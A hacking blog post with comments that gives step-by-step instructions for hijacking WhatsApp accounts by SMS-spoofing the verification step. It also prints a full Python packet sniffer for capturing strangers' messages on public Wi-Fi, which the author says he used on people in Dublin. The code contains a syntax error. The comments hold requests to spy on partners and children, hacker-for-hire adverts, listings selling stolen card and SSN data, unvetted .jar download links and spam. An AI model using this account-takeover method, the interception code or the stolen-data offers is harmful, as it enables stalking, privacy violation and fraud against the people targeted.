How to hack WhatsApp Messenger on Nokia, iPhone & Android
WhatsApp is a cross-platform messing application used by smartphones. It allows users to communicate instant messages and share media via 3G or WiFi with other users on the platform. Back in may 2011 WhatsApp had a security breach when hackers realized that messages were being transmitted unencrypted via plain text which left accounts open for hi-jacking. WhatsApp finally released a security update for this problem and the system became locked down.
REQUIREMENTS:
- 7Zip – Click here to download
- A Windows Computer (Windows XP, Vista, Win 7, Win 8)
- A Phone running WhatsApp (iPhone, Android, Nokia, Blackberry etc)
Please upgrade your browser
In this article i will talk about alternative methods of hi-jacking
WhatsApp messages and other protocols using a variety of methods.
The first hack im going to talk about will spoof WhatsApp and have it
think you are somebody else allowing you to communicate under an
alternative name. This hack works by tricking the WhatsApp Verification
Servers by sending a spoofed request for an authorisation code intended
for an alternative phone. This method is also known to work on several
other IM applications based on iOS, Symbian & Android devices.Hack 1
Install WhatsApp on your deviceWhatsApp now starts a counter where it sends a verification message to its servers. If this verification fails after a specific time then WhatsApp offers alternative methods of verification. A message can be blocked by changing the message center number or pushing the phone into Airplane mode.
WhatsApp now offers an alternative method of verification
Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server.
Next we need to do some SMS-Spoofing
There are numerous ways of doing this for free. A quick google search will pull up a vast amount of services which can spoof email addresses.
If you are using an iPhone use the following details in the SMS spoofer application.
To: +447900347295
From: +(Country code)(mobile number)
Message: (your email address)
If you are using another device then check your outbox and copy the message details into the spoofer application and send the spoofed verification.
You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number.Hack 2
The second attack I’m going to talk about is a little bit more professional. For users who can pull of MITM (Man in the Middle) Attacks this is a sure way to rake in data from a public network. I came across the script at the 0×80 blog so i I tried it on several public networks in Dublin (thanks to the karma code). The amount of data you can pull in from people sitting around you in a short amount of time is quite unreal. The code is written in Python so its nice and simple to work with and edit to make it work for similar chat applications.You will also need to parse the traffic so check this link: http://www.secdev.org/projects/scapy/
Before you have a look at the code you may want to note that WhatsApp blurts out even more information for us to see. Doing a MITM Attack and peeking at the packets we can see that WhatsApp prints the mobile number and the name of the user your target is speaking with. This is important to note this because this data can be used for some social engineering (calling the person to pull more information from them) or by checking web resources such as Facebook or LinkedIn to find their address, email accounts, websites and what ever else your hunting for.
Example
DYN:~/whatsapp# python sniffer.py wlan0
#########################
## whatsapp sniff v0.1 ##
#########################
[+] Interface : wlan0
[+] filter : tcp port 5222
To : ***********
Msg : Hello, I will send you a file.
To : **********
Filename : .jpg
URL : https://mms*.whatsapp.net/a1/0/1/2/3/*md5hash*.jpg
From : ***********
Msg : Thanks file has been recieved, take this file too.
From : ***********
Filename : .jpg
URL : https://mms*.whatsapp.net/a2/0/2/3/1/*md5hash*.jpg
Code
#!/usr/bin/env python
import os
import sys
import scapy.all
import re
Previous_Msg = ""
Previous_Filename = ""
Files = []
Messages = []
Urls = []
def banner():
print "#########################"
print "## whatsapp sniff v0.1 ##"
print "## qnix@0x80.org ##"
print "#########################\n"
def whatsapp_parse(packet):
global Previous_Msg
global Previous_Filename
global Files
global Messages
global Urls
src = packet.sprintf("%IP.src%")
dst = packet.sprintf("%IP.dst%")
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
# Target Sending stuff
if dport == "5222":
Filename = ""
toNumber = ""
Url = ""
Msg = ""
try:
toNumber = re.sub("\D", "", raw)
if(toNumber[5:16].startswith("0")): toNumber = toNumber[6:17]
else: toNumber = toNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except:pass
try: Msg = raw.split("\\xf8\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except:pass
except: pass
if(len(toNumber) >= 10):
if(len(Msg) >= 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "To : ", toNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "To : ", toNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
# Recieved Messages
if sport == "5222":
Msg = ""
fromNumber = ""
Url = ""
Filename = ""
try:
fromNumber = re.sub("\D", "", raw)
if(fromNumber[5:16].startswith("0")): fromNumber = fromNumber[6:17]
else: fromNumber = fromNumber[5:16]
try:
Filename = raw.split("file\\xfc")[1][1:37]
Url = raw.split("file\\xfc")[1].split("\\xa5\\xfc")[1].split("\\xfd\\x00")[0][1:]
except: pass
try: Msg = raw.split("\\x02\\x16\\xfc")[1][4:-1].decode("string_escape")
except: pass
except:pass
if(len(fromNumber) = 1 and Previous_Msg != Msg):
Previous_Msg = Msg
print "From : ", fromNumber
print "Msg : ", Msg
Messages.append(Msg)
elif(len(Filename) >= 1 and Previous_Filename != Filename):
Previous_Filename = Filename
print "From : ", fromNumber
print "Filename : ", Filename
print "URL : ", Url
Files.append(Filename)
Urls.append(Url)
def callback(packet):
sport = packet.sprintf("%IP.sport%")
dport = packet.sprintf("%IP.dport%")
raw = packet.sprintf("%Raw.load%")
if raw != '??':
if dport == "5222" or sport == "5222":
whatsapp_parse(packet)
def main():
banner()
if(len(sys.argv) != 2):
print "%s " % sys.argv[0]
sys.exit(1)
scapy.iface = sys.argv[1]
scapy.verb = 0
scapy.promisc = 0
expr = "tcp port 5222"
print "[+] Interface : ", scapy.iface
print "[+] filter : ", expr
scapy.all.sniff(filter=expr, prn=callback, store=0)
print "[+] iface %s" % scapy.iface
if __name__ == "__main__":
main()
Author: Anonymous
Related Posts:
Whatsapp tricks
Subscribe to:
Post Comments (Atom)
i wonder if there's any hack specially made for google play where you can download paid games for free
ReplyDeletejust go to 4shared.com create an acc and then search for the paid apps u talking abt . u can check them on filecrop
Delete@Anonymous- My Pleasure buddy..
ReplyDelete@business phone- Thanks pal for your comment, soon I'll post that trick, till then keep visiting and don't forget to subscribe.
How can we communicate privately?
ReplyDeletecan i hake conversation
ReplyDeletecan i hake friends contacts and conversation
ReplyDeleteIf you've IP networking basics and decent programming knowledge, you can do it. The method involves MAC spoofing. http://geeknizer.com/how-to-hack-whatsapp-messenger/
ReplyDeleteAm suspicious abt my lover, wats the best Method to hack into her FACEBOOK ACC or WATS APP. . .(Note) .she stays very far away from,
ReplyDeleteWhen i try to connect watsapp from my nokia x2-00 it shows error server could not connect so what to do now
ReplyDelete@शिवश्री- From where you have downloaded the whatsapp messenger ?
DeleteOR
Remove that app and download Whatsapp from this link-
1. https://www.dropbox.com/s/dg0wcs7lzqkcfc1/whatsapp_qvs9c38b.jar
or
2. https://www.dropbox.com/s/648pa5lkv31bcco/whatsapp_o3nkn3l7.jar
May i know any website which i can send spoof sms? I tried but all asking me to pay. please help.
ReplyDelete@Anonymous- Yes you can spoof sms from
Deletehttp://www.smsglobal.com
but they dont allow unlimited access. They give only 25 credits free trial, which is much better then other paid sites.
Hey the email option does not appear to me after the failure to connect with whats app servers , all i get is the sms option without an email and then the call option any help please ?
ReplyDeleteDear Admin,
ReplyDeleteReally a great effort. Appreciated. I also need some advice and guidance in this regard, I want to check the victims whatsapp Contacts and Texts. I know the victims IMEI number, Mobile Number and the model as well, its Symbian, Nokia C3. Please guide me how can it possible for me to get access to it. Thank you so much.
All the best.
Hi! I have the same problem as you. Have you solved it? If yes, could you please tell me how or who helped you?
DeleteThis is indeed interesting stuff. I didn't believe it first, because of the fact that different sources (and newspapers) reported that hacking Whatsapp is not possible anymore. I did once download a good Whatsapphack from this place, but it seems it doesn't work anymore.
ReplyDeleteBoss....it looks cool but i m really new to this...so just tell me karna kyaa dai
ReplyDeleteGuys can I have an app foe whatapp hack because I'm no longer using PC and notebooks I only use windows phone 8
ReplyDeleteohhh I want, give me please...please i need so much :))
DeleteIs there a simple way to hack into someone's messages if you just have their mobile number?
ReplyDeleteI want to know how can i hack my boyfriend'z whatzapp and text..i jst want to spy..he is ignoring me nd i want to kniw who is d reason..pls pks help me
ReplyDeletethis is confusing for an average person
ReplyDeleteMujhe bhi wtsap hack karna h pr mujhe hacking ka h bi nhi ata :(
ReplyDeleteWould You Like To Do Guest Blogging With Us...
ReplyDeleteOr If you need A guest blogger do Reply ....?
It will Help Both Of us increase website ranking...
My Website -- >> TechZine-Inspirations ~ Blogger Template
how can i hack my kids whatsapp
ReplyDeleteDownload WhatsApp Spy Hack Here:
ReplyDeletehttp://www.soulgaminghacks.com/whatsapp-hack-tool/
http://www.soulgaminghacks.com/whatsapp-hack-tool/
http://www.soulgaminghacks.com/whatsapp-hack-tool/
http://www.soulgaminghacks.com/whatsapp-hack-tool/
http://www.soulgaminghacks.com/whatsapp-hack-tool/
This comment has been removed by the author.
ReplyDeletei recommend bestcyberguru@-g-m=a-i=l .c-o=m for any phone spying or gps tracking services. with their help , I was able to spy on my wifes iPhone 11 Pro to see alll her text messages, phone calls, facebook messenger chats, whatsapp chats and more! they were able to install my iphone 8 as the mirror phone so i was viewing everything remotely without stress! just contact bestcyberguru@-g-m=a-i=l .c-o=m
ReplyDeleteIf you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest
ReplyDeleteEmail: cybergoldenhacker at gmail dot com
*SELLING ACTIVE US CC CVV FULLZ*
ReplyDelete------------------------------------
==>COST $5 FOR EACH CC FULLZ<==
*DUMP TRACKS 1 & 2 WITH PIN*
==>Dumps prices
==>Tracks 1&2 US = 85$ per 1
ALL ARE FRESH, VALID & TESTED.
WANT TO BUY, JUST CONTACT ON:
************************************
=>Email > leads.sellers1212@gmail.com
=>Whatsapp > +92 317 2721122
=>Telegram > @leadsupplier
=>ICQ > 752822040
************************************
INFO AVAILABLE:
=>CARD TYPE
=>FIRST NAME & LAST NAME
=>CC NUMBER
=>EXPIRY DATE
=>CVV
=>FULL ADDRESS (ZIP CODE, CITY/TOWN, STATE)
=>PHONE NUMBER,DOB,SSN
=>MOTHER'S MAIDEN NAME
=>VERIFIED BY VISA
=>CVV2
*GOOD BALANCE
*DON'T ASK FOR SAMPLE OR SCREENSHOT
*ALL INFO/DETAILS WILL BE PROVIDE
*PAYMENT IN ADVANCE
*DATA WILL BE SENT IN FEW MINS AFTER PAYMENT
=====================================
Hi All!
ReplyDeleteWe are selling fresh & genuine SSN Leads, with good connectivity. All data is tested & verified.
Headers in Leads:
First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |
*You can ask for sample before any deal
*Each lead will be cost $1
*Premium Lead will be cost $5
*If anyone wants in bulk I will negotiate
*Sampling is just for serious buyers
Hope for the long term deal
For detailed information please contact me on:
Whatsapp > +923172721122
email > leads.sellers1212@gmail.com
telegram > @leadsupplier
ICQ > 752822040
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**PRICE FOR ONE LEAD/FULLZ 2$**
All Leads are Tested & Verified.
Fresh spammed data.
Good credit Scores, 700+ minimum scores.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Minimum buy 25 to 30 leads/fullz
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Now
ReplyDelete>>>>> Download Full
How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download LINK
>>>>> Download Now
How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Full
>>>>> Download LINK
How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Now
ReplyDelete>>>>> Download Full
How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download LINK
>>>>> Download Now
How To Hack Whatsapp Messenger On Nokia, Iphone And Android >>>>> Download Full
>>>>> Download LINK cy
smm panel
ReplyDeletesmm panel
iş ilanları
instagram takipçi satın al
hirdavatci burada
beyazesyateknikservisi.com.tr
servis
jeton hilesi
Good content. You write beautiful things.
ReplyDeletesportsbet
korsan taksi
vbet
vbet
mrbahis
sportsbet
hacklink
hacklink
mrbahis
Good text Write good content success. Thank you
ReplyDeletetipobet
mobil ödeme bahis
betpark
bonus veren siteler
slot siteleri
poker siteleri
betmatik
kibris bahis siteleri
alsancak
ReplyDeletearnavutköy
ataşehir
avcılar
avşa
SACR
ankara
ReplyDeletekadıköy
yozgat
izmir
sivas
3ED
https://saglamproxy.com
ReplyDeletemetin2 proxy
proxy satın al
knight online proxy
mobil proxy satın al
3S7T
görüntülü show
ReplyDeleteücretlishow
Q6Q
https://titandijital.com.tr/
ReplyDeleteağrı parça eşya taşıma
maraş parça eşya taşıma
muğla parça eşya taşıma
uşak parça eşya taşıma
C85FİW
YJTYUK
ReplyDeleteشركة كشف تسربات المياه بالخبر
شركة مكافحة حشرات 65Az0Ztx0O
ReplyDelete